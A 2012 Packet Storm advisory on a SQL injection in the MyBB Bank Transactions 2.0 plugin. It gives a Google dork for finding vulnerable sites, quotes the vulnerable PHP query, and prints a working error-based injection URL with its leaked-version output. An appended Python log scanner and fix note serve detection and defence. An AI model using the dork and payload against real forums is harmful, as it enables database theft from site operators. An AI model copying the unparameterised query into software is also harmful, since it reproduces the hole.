packetstorm | Limb0 | PACKETSTORM:118940
History: Dec 18, 2012 - 12:00 a.m.

MyBB Bank Transactions 2.0 SQL Injection

2012-12-18 00:00:00
limb0
packetstormsecurity.com
`# Exploit Title: MyBB Bank Transactions Plugin SQL Injection  
# Google Dork: inurl:bank.php?transactions=  
# Date: 13.12.2012  
# Exploit Author: limb0  
# Vendor Homepage: http://mods.mybb.com/view/transactions  
# Software Link: www.kingofpersia.ir  
# Version: 2.0  
# Category: Web Security  
# Tested on: Linux  
  
================================SQLi==============================  
Installation:  
1: Download the plugin and copy the files into the correct directory  
2: Activate the plugin  
(At this step you may get an error like:  
SQL Error:  
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM DEFAULT CHARSET=utf8' at line 7  
This error is caused by the plugin. Open bank.php from the /inc/plugins directory and delete this part from every query:  
"TYPE=MyISAM DEFAULT CHARSET=utf8". When you click Activate again, everything should work.)  
  
------------------------------------------------------------------  
  
The vulnerability is in bank.php: the transactions GET parameter is concatenated into the SQL query unquoted and without validation.  
Vulnerable lines:  
  
$uid=$_GET['transactions'];  
$T_ID=1;  
$T_ufetch=$db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE uid=$uid ");  
  
-------------------------------------------------------------------  
  
Instructions:  
Go to: /bank.php?transactions=[SQLi]  
Example:  
/bank.php?transactions=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--  
  
Result:  
1062 - Duplicate entry '5.5.27~1' for key 'group_key'  
  
Proof: http://postimage.org/image/i34m16ejj/  
  
  
  
`
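
Added example (not part of the original advisory or the plugin's code): the vulnerable lines only ever need an integer uid, so any bank.php request whose transactions value is not a bare integer is worth reviewing. The Python below applies that strict-integer check to web-server access logs; the log lines are constructed samples, and the function names and the combined log format are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [18/Dec/2012:10:01:02 +0000] "GET /bank.php?transactions=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [18/Dec/2012:10:03:40 +0000] "GET /bank.php?transactions=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1-- HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.23 - - [18/Dec/2012:10:04:05 +0000] "GET /bank.php?transactions=1%20OR%201 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [18/Dec/2012:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Dec/2012:10:06:11 +0000] "GET /forum/bank.php?action=view&transactions=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Client address, then the quoted request line of a combined-format entry.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# ASCII digits only: \d would also accept non-ASCII Unicode digits.
UID_RE = re.compile(r'[0-9]{1,10}')


def is_valid_uid(value):
    """True only for a bare decimal uid, the only form bank.php needs."""
    return UID_RE.fullmatch(value) is not None


def suspicious_requests(log_text):
    """Return (client_ip, decoded_value) for every bank.php request whose
    transactions parameter is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/bank.php"):
            continue
        # parse_qs URL-decodes the value, so %20 and + both compare as spaces.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("transactions", []):
            if not is_valid_uid(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(ip, repr(value))
```

The same rule is the server-side fix: reject or integer-cast the transactions value before it is placed in the query.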